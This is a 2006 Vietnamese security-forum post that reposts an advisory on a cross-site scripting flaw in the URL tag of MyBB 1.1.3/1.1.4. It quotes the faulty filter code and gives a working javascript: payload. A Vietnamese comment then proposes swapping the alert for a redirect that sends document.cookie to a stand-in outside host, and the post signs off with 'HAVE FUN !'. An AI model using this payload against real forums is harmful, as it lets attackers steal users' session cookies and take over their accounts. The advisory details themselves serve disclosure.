MyBB 1.1.4~function_post.php XSS Attack In URL tag

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

MyBB 1.1.4~function_post.php XSS Attack In URL tag

[Question] MyBB 1.1.4~function_post.php XSS Attack In URL tag	29/06/2006 12:30:28 (+0700) \| #1 \| 2018

phamquoc_truong
Elite Member

Joined: 04/04/2004 07:54:12
Messages: 79
Location: PeaceWorld
Offline

Software: MyBB
Sowtware’s Web Site: http://www.mybboard.com
Versions: 1.1.3
Class: Remote
Status: Patched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level:low-medium
========================
{inc/functions_post.php}near 138
function fixjavascript($message)
{
$message = preg_replace(”#javascript:#i”, “java script:”, $message);
/* …….. */

{alos near 19}
$message = preg_replace(”#&(?!\#[0-9]+ smilie

#si”, “&”, $message); // fix & but allow unicode
=========================
Khai thác :
Post bài viết với nội dung :
Code:

[url]javascript:alert(’Are you chicken ?’);//://ddd[/url]

Nếu như thay cái alert kia thằng cái 'window.localtion=http://domain.com/ghi.php?mybb='+document.cookie <== Vãi tội.

nguyên bản : http://myimei.com/security/2006-06-22/mybb-114-function_postphpxss-attack-in-url-tag.html

HAVE FUN !

Go to:

Users currently in here
1 Anonymous